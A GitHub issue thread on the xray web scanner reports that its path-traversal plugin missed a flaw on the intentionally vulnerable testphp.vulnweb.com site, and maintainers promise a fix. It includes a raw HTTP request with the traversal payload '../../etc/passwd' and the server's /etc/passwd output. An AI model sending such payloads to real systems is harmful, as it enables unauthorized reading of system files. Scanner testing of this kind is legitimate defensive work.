### ISSUE TITLE
path-traversal 存在漏洞没检测出来

### ISSUE THREAD

**Issue by pwnhxl** [chaitin/xray#1713]
`
.\xray_windows_386.exe webscan --url http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg --plugins path-traversal
`
<img width="859" alt="111" src="https://user-images.githubusercontent.com/104293903/219627729-3f7892e0-d5b9-4ab8-83cb-7723d99a792a.png">

GET /showimage.php?file=../../etc/passwd HTTP/1.1
Host: testphp.vulnweb.com
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.0
Date: Fri, 17 Feb 2023 10:37:28 GMT
Content-Type: image/jpeg
Connection: close
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Length: 845

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
nobody:x:65534:1002:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

**Comment by mashiro01** [comment]
已经加强相关插件内容，近期会进行更新
![image](https://user-images.githubusercontent.com/30515297/220006126-25cf42af-4418-4d64-8dc6-c9a9ce10b58f.png)

**Comment by anasbousselham** [comment]
The same issue, it's not working (ver 1.9.1)

**Comment by mashiro01** [comment]
> The same issue, it's not working (ver 1.9.1)

Do you mean the same testing website? Yes, this problem is alreay known and we have enhace this plugin, the update will be ready in the near future.

**Comment by anasbousselham** [comment]
Yes, the same endpoit, It's a great news.
Thanks.
